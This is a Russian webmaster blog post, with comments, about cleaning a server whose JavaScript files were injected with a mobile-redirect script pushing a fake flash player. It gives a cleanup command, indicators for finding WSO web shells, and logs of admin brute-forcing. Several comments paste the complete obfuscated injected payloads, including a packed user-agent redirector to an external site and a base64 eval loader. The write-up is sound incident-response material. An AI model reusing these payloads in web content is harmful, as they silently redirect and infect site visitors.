На одном клиентском сайте на левом сервере вдруг обнаружилось, что все мобильные устройства редиректятся на
[cc lang=”bash”] newbestflashplayer.ru
[/cc]
В притом на устройствах андройда сразу проходит установка этого чудо флеш плеера ниочём не спрашивая.
разбор полётов выяснил что в сайте\сайтах на сервере были заражены все JS файлы вот таким кодом
[cc lang=”bash”]
;document.write(unescape(“%3C%73%63%72%69%70%74%20%74%793B%3C%2
F%73%63%72%69%70%74%3E”));
[/cc]
я середину скрипта вырезал ибо смысла нет гуглится будет и по началу и по концу
немного дешифровав его я получил вот такой
[cc lang=”bash”]
;document.write(unescape(““));
[/cc]
это оставлено тоже для тезх кто будет гуглить….
в общем чтоб вырезать эту ересь собрался вот такая вот команда
[cc lang=”bash”]
find ./ -type f -name “*.js” -exec perl -pi -e ‘s/\;document.write\(unescape\(\”\%3C\%73.*\%3E\”\)\);//g”’ ‘{}’ \;
[/cc]
Отдельная история как это могло попасть на сервер…..
UPD1
про комманду
[cc lang=”bash”]
find ./ -type f -name “*.js” -exec perl -pi -e ‘s/\;document.write\(unescape\(\”\%3C\%73.*\%3E\”\)\);//g”’ ‘{}’ \;
[/cc]
тело вируса заменяется пустым, тело вируса вписываем сюда
's/\;document.write\(unescape\(\"\%3C\%73.*\%3E\"\)\);//g'''
начало его и конец, до точки начало, после точки конец с экранированием спец символов через \
после второго заражения код вируса немного поменялся, и последние цифры были уже другие.
Для того, чтоб зараза заного не расспространялась ищите залитый shell чаще всего мне попадаются WSO 2.5 легко гуглится, и даже себе спецом заливал его для эксперементов по настройке защиты сервера.
удалось мне обезвредить его, для того чтоб он стал беспомощьным, и мог навредить только одному сайту, куда он залит…
про то как он мог попасть на сервер.
вариантов не много
1 кто-то протроянился утекли фтп доступы
2 использование шаблонов\модулей\компонентов скачанных с сомнительных сайтов
делаем поиск по всем пхп файлам… ну скажем у меня было несколько шеллов не полностью закодированные, а частично первые строки были открыты
$auth_pass = "d738664f57d0cc63169931feb9f91cb5";
введя в поиск все пхп файлы где есть слово $auth_pass я нашёл ещё десяток другой разбросанных файлов….
ещё очень рекомендую внимательно посмотреть все файлы содержащие
конструкцию
preg_replace("/.*/e
также внимательно посмотреть все файлы, что используют eval(
Дальше.. про настройку сервера, чтоб шеллы не работали поговорим отдельно..
UPD2
Пошёл другие подвласные мне сервера искать, нашёл 2 шелла ещё, один в джумле полноценно установлен плагин системный
дальше всё стандартно
как установили, на 99% уверен что подобрали пароль.
потому, что админский пароль быль простой из словарей
а в логах невероятно много проб зайти в админку
[cc lang=”bash”]
31.202.231.7 – – [12/Mar/2013:03:57:14 +0800] “POST /administrator/index.php HTTP/1.0” 303 288
31.202.231.7 – – [12/Mar/2013:03:57:15 +0800] “GET /administrator/index.php HTTP/1.0” 200 5508
31.202.231.7 – – [12/Mar/2013:03:57:15 +0800] “GET /administrator/index.php HTTP/1.0” 200 5237
31.202.231.7 – – [14/Mar/2013:00:27:59 +0800] “GET /administrator/ HTTP/1.0” 200 5318
31.202.231.7 – – [14/Mar/2013:00:28:03 +0800] “POST /administrator/index.php HTTP/1.0” 303 288
31.202.231.7 – – [14/Mar/2013:00:28:03 +0800] “GET /administrator/index.php HTTP/1.0” 200 5508
31.202.231.7 – – [14/Mar/2013:00:28:04 +0800] “GET /administrator/index.php HTTP/1.0” 200 5237
31.202.231.7 – – [16/Mar/2013:01:46:18 +0800] “GET /administrator/ HTTP/1.0” 200 5318
31.202.231.7 – – [16/Mar/2013:01:46:19 +0800] “POST /administrator/index.php HTTP/1.0” 303 288
31.202.231.7 – – [16/Mar/2013:01:46:19 +0800] “GET /administrator/index.php HTTP/1.0” 200 5508
31.202.231.7 – – [16/Mar/2013:01:46:20 +0800] “GET /administrator/index.php HTTP/1.0” 200 5237
31.202.231.7 – – [17/Mar/2013:14:23:59 +0800] “GET /administrator/ HTTP/1.0” 200 5318
31.202.231.7 – – [17/Mar/2013:14:24:00 +0800] “POST /administrator/index.php HTTP/1.0” 303 288
31.202.231.7 – – [17/Mar/2013:14:24:00 +0800] “GET /administrator/index.php HTTP/1.0” 200 5508
31.202.231.7 – – [17/Mar/2013:14:24:01 +0800] “GET /administrator/index.php HTTP/1.0″ 200 5237
[/cc]
ещё один из методов поиска через логи, если в джумле включен ЧПУ то прямые обращения к *.php файлам будут подозрительны, проверим.
ну скажем
вот так [cc lang=”bash”]cat apache-access.log | grep .php[/cc]
ну и недолго листая список видим
[cc lang=”bash”]
95.141.44.170 – – [10/Mar/2013:20:12:03 +0800] “GET /administrator/index.php HTTP/1.0” 200 2513
95.141.44.170 – – [10/Mar/2013:20:12:12 +0800] “POST /administrator/index.php HTTP/1.0” 303 333
95.141.44.170 – – [10/Mar/2013:20:12:13 +0800] “GET /administrator/index.php HTTP/1.0” 200 5571
95.141.44.170 – – [10/Mar/2013:20:12:25 +0800] “GET /administrator/index.php?option=com_installer HTTP/1.0” 200 5327
95.141.44.170 – – [10/Mar/2013:20:12:33 +0800] “POST /administrator/index.php?option=com_installer&view=install HTTP/1.0” 303 367
95.141.44.170 – – [10/Mar/2013:20:12:34 +0800] “GET /administrator/index.php?option=com_installer&view=install HTTP/1.0” 200 5423
95.141.44.170 – – [10/Mar/2013:20:12:39 +0800] “GET /plugins/system/core/core.php HTTP/1.0” 200 360
95.141.44.170 – – [10/Mar/2013:21:23:58 +0800] “GET /plugins/system/core/core.php HTTP/1.0″ 200 3364
[/cc]
ага видим, что этот айпишник делал.
[cc lang=”bash”]
# cat apache-access.log | grep 95.141.44.170
95.141.44.170 – – [29/Nov/2012:16:11:41 +0800] “GET /administrator/index.php HTTP/1.0” 200 5318
95.141.44.170 – – [29/Nov/2012:16:11:42 +0800] “POST /administrator/index.php HTTP/1.0” 303 288
95.141.44.170 – – [29/Nov/2012:16:11:42 +0800] “GET /administrator/index.php HTTP/1.0” 200 5508
95.141.44.170 – – [29/Nov/2012:16:54:56 +0800] “GET /administrator/index.php HTTP/1.0” 200 5318
95.141.44.170 – – [29/Nov/2012:16:54:56 +0800] “POST /administrator/index.php HTTP/1.0” 303 288
95.141.44.170 – – [29/Nov/2012:16:54:57 +0800] “GET /administrator/index.php HTTP/1.0” 200 5508
95.141.44.170 – – [29/Nov/2012:17:35:36 +0800] “GET /administrator/index.php HTTP/1.0” 200 5318
95.141.44.170 – – [29/Nov/2012:17:35:37 +0800] “POST /administrator/index.php HTTP/1.0” 303 288
95.141.44.170 – – [29/Nov/2012:17:35:37 +0800] “GET /administrator/index.php HTTP/1.0” 200 5508
95.141.44.170 – – [29/Nov/2012:18:16:35 +0800] “GET /administrator/index.php HTTP/1.0” 200 5318
95.141.44.170 – – [29/Nov/2012:18:16:36 +0800] “POST /administrator/index.php HTTP/1.0” 303 288
95.141.44.170 – – [29/Nov/2012:18:16:36 +0800] “GET /administrator/index.php HTTP/1.0” 200 5508
95.141.44.170 – – [29/Nov/2012:18:58:51 +0800] “GET /administrator/index.php HTTP/1.0” 200 5318
95.141.44.170 – – [29/Nov/2012:18:58:52 +0800] “POST /administrator/index.php HTTP/1.0” 303 288
95.141.44.170 – – [29/Nov/2012:18:58:53 +0800] “GET /administrator/index.php HTTP/1.0” 200 5508
95.141.44.170 – – [10/Mar/2013:20:12:03 +0800] “GET /administrator/index.php HTTP/1.0” 200 2513
95.141.44.170 – – [10/Mar/2013:20:12:12 +0800] “POST /administrator/index.php HTTP/1.0” 303 333
95.141.44.170 – – [10/Mar/2013:20:12:13 +0800] “GET /administrator/index.php HTTP/1.0” 200 5571
95.141.44.170 – – [10/Mar/2013:20:12:25 +0800] “GET /administrator/index.php?option=com_installer HTTP/1.0” 200 5327
95.141.44.170 – – [10/Mar/2013:20:12:33 +0800] “POST /administrator/index.php?option=com_installer&view=install HTTP/1.0” 303 367
95.141.44.170 – – [10/Mar/2013:20:12:34 +0800] “GET /administrator/index.php?option=com_installer&view=install HTTP/1.0” 200 5423
95.141.44.170 – – [10/Mar/2013:20:12:39 +0800] “GET /plugins/system/core/core.php HTTP/1.0” 200 360
95.141.44.170 – – [10/Mar/2013:21:23:58 +0800] “GET /plugins/system/core/core.php HTTP/1.0” 200 3364
[/cc]
ну вот подбирал пароль, подобрал и залил плагин.
сейчас просто волна видимо пошла….
шелл я нашёл поиском, навредить не успел, ну и меняйте господа пароли…
Подцепил совсем недавно точно такой же вирус. Спасибо за команду! А возникло сразу после обновления на последнюю версию WordPress
Тоже есть такая же проблема. Подскажите, откуда запускать эту команду?
подцепил такую заразу на свои сайты:( joomla 1.5, 2.5
Однако, чистка *.js не на всех сайтах дает результат. С мобильных устройств все равно идет редирект.
Отдельная история как это могло попасть на сервер…..
есть идеи как?
Я поспешил с вордпрессом. Судя по всему целью скрипткидов стала старая версия джумлы. Или какой-то из её компонентов позволяющий выполнять произвольный код. Благодаря этому на хостинге вылезла целая куча ремот консолей и php proxy. Удалял это всё смотря время модификации файлов, командой:
find ./ -type f -mtime -700 | grep “php” | less
Время модификации подкручивайте в зависимости от своих сайтов. Вообще я не особо разбираюсь в линуксе и было бы не плохо если автор дополнил с более оптимальным решением.
Так же есть подозрение, что косячный плагин редактора jce, как бы это не расшифровывалось 🙂
А для такой ереси, какую команду писать?
;document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B%32%39%29%3A%63%2E%74%6F%53%74%72%69%6E%67%28%33%36%29%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%37%20%31%3D%38%2E%39%2E%61%28%2F%28%62%29%7C%28%65%29%7C%28%66%29%7C%28%68%29%7C%28%6A%29%7C%28%6B%29%7C%28%6C%29%7C%28%6D%29%7C%28%6E%29%7C%28%6F%29%7C%28%70%29%7C%28%71%29%7C%28%72%29%7C%28%73%29%7C%28%75%2D%29%7C%28%77%29%7C%28%78%29%7C%28%79%29%7C%28%7A%29%7C%28%41%29%7C%28%42%29%7C%28%43%29%7C%28%44%29%7C%28%45%29%7C%28%46%29%7C%28%47%29%7C%28%30%2D%63%29%7C%28%30%2D%64%29%7C%28%30%2D%67%29%7C%28%48%2D%29%7C%28%49%29%7C%28%4A%29%7C%28%32%29%7C%28%4B%29%7C%28%4C%29%7C%28%4D%29%7C%28%4E%2D%29%7C%28%4F%29%7C%28%50%29%7C%28%51%2D%29%7C%28%52%29%7C%28%53%29%7C%28%54%29%7C%28%55%29%7C%28%56%29%7C%28%57%29%7C%28%58%29%7C%28%59%29%7C%28%5A%29%7C%28%31%30%29%7C%28%31%31%29%7C%28%31%32%29%7C%28%31%33%29%7C%28%31%34%29%7C%28%31%35%29%7C%28%31%36%29%7C%28%31%37%29%7C%28%31%38%2D%29%7C%28%31%39%2D%29%7C%28%31%61%29%7C%28%31%62%29%7C%28%31%63%2D%29%7C%28%31%64%29%7C%28%31%65%2D%29%7C%28%31%66%29%7C%28%31%67%29%7C%28%31%68%29%7C%28%31%69%29%7C%28%31%6A%2D%29%7C%28%31%6B%29%7C%28%74%2D%31%6C%29%7C%28%31%6D%29%7C%28%31%6E%2D%29%7C%28%31%6F%29%7C%28%31%70%2D%29%7C%28%31%71%29%7C%28%31%72%29%7C%28%31%73%2D%76%29%7C%28%31%74%29%7C%28%31%75%29%7C%28%33%2D%29%7C%28%31%76%29%7C%28%31%77%29%7C%28%31%78%29%7C%28%31%79%29%7C%28%31%7A%29%7C%28%34%29%7C%28%34%29%7C%28%35%29%7C%28%35%2D%29%7C%28%36%2E%31%41%29%7C%28%36%2E%31%42%29%7C%28%31%43%2E%31%44%29%7C%28%31%45%29%7C%28%31%46%29%7C%28%31%47%29%7C%28%31%48%29%7C%28%32%29%7C%28%33%29%7C%28%31%49%29%7C%28%31%4A%29%7C%28%31%4B%29%7C%28%31%4C%29%7C%28%31%4D%29%7C%28%31%4E%29%7C%28%31%4F%29%7C%28%31%50%2E%31%51%29%7C%28%31%52%29%7C%28%31%53%29%2F%69%29%3B%31%54%28%31%29%7B%31%55%2E%31%56%2E%31%57%3D%22%31%58%22%7D%27%2C%36%32%2C%31%32%32%2C%27%6C%67%7C%69%73%6D%6F%62%69%6C%65%7C%6D%69%64%70%7C%77%61%70%7C%77%69%6E%77%7C%78%64%61%7C%75%70%7C%76%61%72%7C%6E%61%76%69%67%61%74%6F%72%7C%75%73%65%72%41%67%65%6E%74%7C%6D%61%74%63%68%7C%61%63%73%7C%7C%7C%61%6C%61%76%7C%61%6C%63%61%7C%7C%61%6D%6F%69%7C%7C%61%75%64%69%7C%61%73%74%65%7C%61%76%61%6E%7C%62%65%6E%71%7C%62%69%72%64%7C%62%6C%61%63%7C%62%6C%61%7A%7C%62%72%65%77%7C%63%65%6C%6C%7C%63%6C%64%63%7C%7C%63%6D%64%7C%7C%64%61%6E%67%7C%64%6F%63%6F%7C%65%72%69%63%7C%68%69%70%74%7C%69%6E%6E%6F%7C%69%70%61%71%7C%6A%61%76%61%7C%6A%69%67%73%7C%6B%64%64%69%7C%6B%65%6A%69%7C%6C%65%6E%6F%7C%6C%67%65%7C%6D%61%75%69%7C%6D%61%78%6F%7C%6D%69%74%73%7C%6D%6D%65%66%7C%6D%6F%62%69%7C%6D%6F%74%7C%6D%6F%74%6F%7C%6D%77%62%70%7C%6E%65%63%7C%6E%65%77%74%7C%6E%6F%6B%69%7C%6F%70%77%76%7C%70%61%6C%6D%7C%70%61%6E%61%7C%70%61%6E%74%7C%70%64%78%67%7C%70%68%69%6C%7C%70%6C%61%79%7C%70%6C%75%63%7C%70%6F%72%74%7C%70%72%6F%78%7C%71%74%65%6B%7C%71%77%61%70%7C%73%61%67%65%7C%73%61%6D%73%7C%73%61%6E%79%7C%73%63%68%7C%73%65%63%7C%73%65%6E%64%7C%73%65%72%69%7C%73%67%68%7C%73%68%61%72%7C%73%69%65%7C%73%69%65%6D%7C%73%6D%61%6C%7C%73%6D%61%72%7C%73%6F%6E%79%7C%73%70%68%7C%73%79%6D%62%7C%6D%6F%7C%74%65%6C%69%7C%74%69%6D%7C%74%6F%73%68%7C%74%73%6D%7C%75%70%67%31%7C%75%70%73%69%7C%76%6B%7C%76%6F%64%61%7C%77%33%63%73%7C%77%61%70%61%7C%77%61%70%69%7C%77%61%70%70%7C%77%61%70%72%7C%77%65%62%63%7C%62%72%6F%77%73%65%72%7C%6C%69%6E%6B%7C%77%69%6E%64%6F%77%73%7C%63%65%7C%69%65%6D%6F%62%69%6C%65%7C%6D%69%6E%69%7C%6D%6D%70%7C%73%79%6D%62%69%61%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));
;var OOO='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';var _0x84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=","","charAt","indexOf","fromCharCode","length"];function lI1(data){var I11lOI=_0x84de[0];var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc=_0x84de[1];do{h1=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));h2=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));h3=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));
;document.write(unescape("eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|http://online2you.org/search.php?sid=1 '.split('|'),0,{})); "));
;var OOO='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKJlUMfhCZslGaDRmblBHch5CbPlkC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ACbPlEIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmL0BXayN2chZXYqJ3b0F2YzVnZi9mLpBXYv8iOwRHdodCI9AyYyNnLJlUMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ASSJFzXgIXY2tzJFNTJ0BXayN2cvM0MlI0MlkjMlkjMlQ0NlI0NlMkMlAzQyUSOyUyNyUyQ3UyNyUCOyUCdpxGcz5yNyUSMENTJkl2cGNTJwhGcug2YyFWZz9yZy9mL19WeyUmbpxmbv9yLBNTJwRHdoN0NlYWZyh2Q3UibvlGdhN2bsN0NlQnbl1Wdj9GZDdTJml2Q3USZu9Gawl2Q3UCZhBXaDdTJp5WaNN0NlEmclB3TDdTJwYzcllmclN1Q3UyQQB1Q3USYkB3Q3UCZp9mck5WYDdTJlxWai9WbDdTJ0V2aj9GcDdTJl52boB3Q3UibhlmYtl3cDdTJw1WbDdTJp5WatN0NlUGbpJ2btVWaDdTJlN2Q3Uyc39GZul2dDdTJr5WasN0NlIXZzd3byJ2Q3UyYiV2dDdTJyBXY3N0NlAHchd3Q3USawF2dDdTJhBXY3N0NlM3Yzc3Q3USYk9mdDdTJrZ3Q3USazBXdDdT